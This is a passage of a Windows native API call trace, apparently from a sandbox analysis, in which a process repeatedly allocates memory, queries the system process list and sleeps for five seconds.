Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.062] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.125] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.201] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 